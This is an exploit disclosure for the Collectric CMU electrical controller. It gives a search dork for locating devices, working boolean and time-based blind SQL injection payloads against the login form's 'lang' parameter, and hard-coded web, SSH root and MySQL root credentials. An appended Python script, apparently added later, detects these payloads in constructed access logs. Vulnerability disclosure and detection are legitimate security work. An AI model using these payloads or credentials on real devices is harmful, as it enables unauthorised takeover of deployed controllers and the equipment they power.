# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters,
# camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exist, see my other vulnerability reports.

# Parameter: lang (GET)

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in

# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish-made controller device for electrical devices such as car heaters, camping sites etc., powered by an NGW board running Linux 2.6.30 with a PHP admin interface.
More vulnerabilities exist, see my other vulnerability reports.
---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin
SSH user/root credentials:
username: kplc
password: kplc
username: root
password: zoogin
*The SSH server is running Dropbear sshd 0.52 (protocol 2.0), which requires diffie-hellman-group1-sha1.
MySQL root credentials:
username: root
password: sql4u
---
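
Added example (not part of the original report and not vendor code): a log check for the 'lang' injection described in the first report above. It assumes an Apache-style access log and that a legitimate lang value is a bare upper-case name like SWEDISH; /login.php is a placeholder path and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate lang value is a bare upper-case name such as SWEDISH.
LANG_OK = re.compile(r"[A-Z]{2,20}")
# Request line of an Apache-style access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_lang_requests(log_lines):
    """Return (line_number, decoded_lang) for every lang value that is not a bare name."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        query = urlsplit(match.group(1)).query
        # parse_qs URL-decodes values, so encoded quotes and spaces are caught too.
        for value in parse_qs(query, keep_blank_values=True).get("lang", []):
            if not LANG_OK.fullmatch(value):
                hits.append((number, value))
    return hits


# Constructed sample log: placeholder path, documentation-range addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2018:10:00:00 +0200] '
    '"GET /login.php?username=a&lang=SWEDISH&submit=Logga+in HTTP/1.1" 200 512',
    '192.0.2.66 - - [15/Sep/2018:10:01:00 +0200] '
    '"GET /login.php?username=yUqg&lang=SWEDISH%27%20AND%201320%3D1320%20AND%20'
    '%27EXAr%27%3D%27EXAr&submit=Logga+in HTTP/1.1" 200 512',
    '192.0.2.66 - - [15/Sep/2018:10:01:07 +0200] '
    '"GET /login.php?username=yUqg&lang=SWEDISH%27%20AND%20SLEEP%285%29%20AND%20'
    '%27kglV%27%3D%27kglV&submit=Logga+in HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Sep/2018:10:02:00 +0200] "GET /favicon.ico HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, value in suspicious_lang_requests(SAMPLE_LOG):
        print(f"line {number}: unexpected lang value {value!r}")
```

The same bare-name check is what the login handler should apply to lang before the value reaches any SQL statement, in addition to using parameterized queries.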